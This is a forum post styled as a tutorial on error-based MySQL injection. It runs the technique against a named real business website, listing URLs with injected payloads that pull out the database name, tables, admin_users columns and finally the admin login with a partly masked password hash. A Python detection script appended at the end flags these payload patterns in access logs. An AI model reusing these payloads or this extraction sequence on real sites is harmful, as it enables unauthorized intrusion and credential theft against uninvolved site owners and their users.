Sheyken

[Tutorial] MySQL Injection Error Based


Posted (edited)

[+] Target : Export Related Service Companies - Oportunidad de Negocios en Línea - Guatemala

[+] Document : MySQL Injection Error based

--------------------------------------------

1. To find the version, you need the following query:

or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1--+

In my case it will be:

 http://www.negociosgt.com/main.php?idioma=ENG&show_empresas=1&id_area=3  or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1--+ 

Duplicate entry '5.1.61~1' for key 'group_key'

2. To find the database name, you need the following query:

and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

In my case it will be:

http://www.negociosgt.com/main.php?idioma=ENG&show_empresas=1&id_area=3 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) 

Duplicate entry 'aw_negocio~1' for key 'group_key'

3. To extract the tables from the aw_negocio database, you need the following query:

and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=0x<hex of the database name> limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Duplicate entry 'admin_log_users~1' for key 'group_key'

You may be wondering why I highlighted "limit 0,1"; well, the answer is:

With limit 0,1 we receive a single table, the one above (admin_log_users). To move on to the next table, we need to make a small change to the query:

and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=0x61775f6e65676f63696f limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Next table:

http://www.negociosgt.com/main.php?idioma=ENG&show_empresas=1&id_area=3  and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=0x61775f6e65676f63696f limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) 

Duplicate entry 'admin_menu~1' for key 'group_key'

Next table:

http://www.negociosgt.com/main.php?idioma=ENG&show_empresas=1&id_area=3 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Duplicate entry 'admin_users~1' for key 'group_key'

4. Extracting the columns from the admin_users table:

You need the following query:

and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x<hex of the respective table name> [ admin_users ] limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

In my case:

http://www.negociosgt.com/main.php?idioma=ENG&show_empresas=1&id_area=3 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e5f7573657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) 

61646d696e5f7573657273 = admin_users [HEX]

----------------------------------

First column of the admin_users table:

Duplicate entry 'id_users~1' for key 'group_key'

Query:

and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e5f7573657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Second column of the admin_users table:

Duplicate entry 'id_level~1' for key 'group_key'

Query:

and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e5f7573657273 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Third column of the admin_users table:

Duplicate entry 'login~1' for key 'group_key'

Query:

and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e5f7573657273 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Fourth column of the admin_users table:

Duplicate entry 'password~1' for key 'group_key'

Query:

and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e5f7573657273 limit 3,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

5. Extracting the data from the login & password columns:

You need the following query:

and (select 1 from (select count(*),concat((select(select concat(cast(concat(Column,0x7e,Column) as char),0x7e)) from Database.Table limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

In my case:

http://www.negociosgt.com/main.php?idioma=ENG&show_empresas=1&id_area=3 and (select 1 from (select count(*),concat((select(select concat(cast(concat(login,0x7e,password) as char),0x7e)) from aw_negocio.admin_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Duplicate entry 'admin~$1$azig*********PrLWU4KWNhZ//LKIm/~1' for key 'group_key'

User: admin

Password: $1$azig*********PrLWU4KWNhZ//LKIm/

----------------------------------

Sheyken - Romanian Security Team

----------------------------------


Edited by Sheyken
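
Added example, not part of the original post: a defender-side check for the two signatures this technique leaves behind, the floor(rand(0)*2) plus group by payload in the request and the "Duplicate entry ... for key 'group_key'" error echoed in the response. The log lines, the /item.php path and the rule names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Request side: fragments of the duplicate-key technique shown in the post.
FLOOR_RAND = re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)", re.I)
GROUP_BY = re.compile(r"\bgroup\s+by\b", re.I)
INFO_SCHEMA = re.compile(r"\binformation_schema\s*\.\s*(tables|columns)\b", re.I)
# Response side: the MySQL error text an application should never echo to clients.
DUP_ERROR = re.compile(r"Duplicate entry '(.*)~1' for key 'group_key'")
# Apache/nginx "combined" log line: client IP and request target.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')

# Constructed sample log lines (hypothetical path and documentation-range IPs).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /item.php?id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /item.php?id=3%20or%201%20group%20by%20concat_ws(0x7e,version(),floor(rand(0)*2))%20having%20min(0)%20or%201--+ HTTP/1.1" 200 310 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /item.php?id=3+and+(select+1+from+(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 200 298 "-" "Mozilla/5.0"',
]


def classify_request(target):
    """Return the set of rule names matched by one request target."""
    decoded = unquote_plus(unquote_plus(target))  # second pass catches double encoding
    hits = set()
    if FLOOR_RAND.search(decoded) and GROUP_BY.search(decoded):
        hits.add("duplicate_key_error_oracle")
    if INFO_SCHEMA.search(decoded):
        hits.add("schema_enumeration")
    return hits


def scan_access_log(lines):
    """Return a list of (client_ip, sorted rule names) for suspicious lines."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        hits = classify_request(m.group(2))
        if hits:
            findings.append((m.group(1), sorted(hits)))
    return findings


def leaked_value(body):
    """Return the value exposed by a leaked duplicate-key error, or None."""
    m = DUP_ERROR.search(body)
    return m.group(1) if m else None
```

A non-None result from leaked_value on any response body means raw database errors are reaching clients; the fix on the application side is a parameterized query for the numeric parameter plus generic error pages.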
